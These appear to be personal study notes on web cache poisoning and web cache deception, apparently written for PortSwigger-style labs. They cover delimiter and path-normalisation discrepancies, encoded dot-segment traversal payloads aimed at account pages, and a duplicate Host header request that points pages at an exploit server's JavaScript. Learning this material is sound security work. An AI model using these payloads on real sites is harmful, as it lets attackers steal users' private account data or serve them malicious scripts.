What is Cache Poisoning
Cache poisoning is an attack where malicious data is inserted into a cache, causing it to return incorrect or harmful information. This can mislead users or systems, such as redirecting them to malicious sites or serving corrupted content. It can occur in DNS, web, or CDN caches, and is a serious security risk.
Searching for Cache Poisoning
- Web Cache
- Origin delimiters
- URL discrepancies (Delimiter)
https://portswigger.net/research/gotta-cache-em-all
---------------------------------------------------------------------------------
# Detecting origin delimiters (Dynamic / Static path)
- Get /my-account
- Get /my-account/abc ---> 404? origin server doesn't abstract path to /my-account
- Get /my-accountabc ---> 404? no evidence of caching.
- Get /my-account§§abc (Intruder) Delimiter discrepancies (find path delimiter)
Different Framework will ue different delimiter (CDN)
---------------------------------------------------------------------------------
# Path Caching
- Get /<arbitrary directory>/..%2fmy-account ---> See how it resolve 200 | 400
- Try encoding or not the Delimiter discrepancies
- Find a ressource that work with caching (Images, ressources, ...)
---------------------------------------------------------------------------------
# Detecting cache delimiters
## If the cache server resolves encoded dot-segments but the origin server
doesn't, you can exploit this by crafting a payload like this:
- Get /<dynamic-path>%2f%2e%2e%2f<static-directory-prefix> (encoding ..)
- ex: /profile%2f%2e%2e%2fstatic
- The cache interprets the path as:Â /static
- The origin server interprets the path as:Â /profile%2f%2e%2e%2fstatic
- ex: /profile;%2f%2e%2e%2fstatic
- The cache interprets the path as:Â /static
- The origin server interprets the path as:Â /profile
- Use delimiter & cached path /my-account?%2f%2e%2e%2fresources
- Use certain files (robots.txt, index.html, and favicon.ico)
- /profile%2f%2e%2e%2findex.html# Delimiter discrepancies
Combine encoding techniques with path traversal to expand the testing scope.
- ? ---> /profile?foo
- ; ---> /profile;foo.css
- . ---> /profile.css
- ;
- :
- # ---> /profile#abc.js & /profile%23wcd.css (Encoded)
- [ or ]
- @
- !
- $
- &
- "
- ( or )
- *
- +
- =
- %00 ---> /profile%00foo.js
---------------------------------------------------------------------------------
# Static directories
- /static
- /assets
- /wp-content
- /media
- /templates
- /public
- /shared
- ...
Example:
---------------------------------------------------------------------------------
# Static files
- /robots.txt
- /favicon.ico
- /index.html
Example: /myAccount$/..%2frobots.txt ---> Cache = /robots.txt | Server = /myAccountExploitation
# Poison header (Targeting Element Source)
GET / HTTP1.1
Host: website.com
Host: exploit-server.net
Then on the exploit server, create directory and files and try to impersonate the JS file from website.com so that when the page loads, it uses exploit-server.net for the JS file instead of website.com.
---------------------------------------------------------------------------------
Extra Information
The following tables illustrate how different HTTP servers and web cache proxies normalize the path /hello/..%2fworld. Some resolve the path to /world, while others don't normalize it at all.
![[Pasted image 20241203091043.png]]
Each CDN or cache proxy defines its own list of recognized static extensions. The image below shows those listed by CloudFlare:
![[Pasted image 20241203091233.png]]
# Poison Page
/home(DELIMITER)/../exploit
/style.css$/../exploit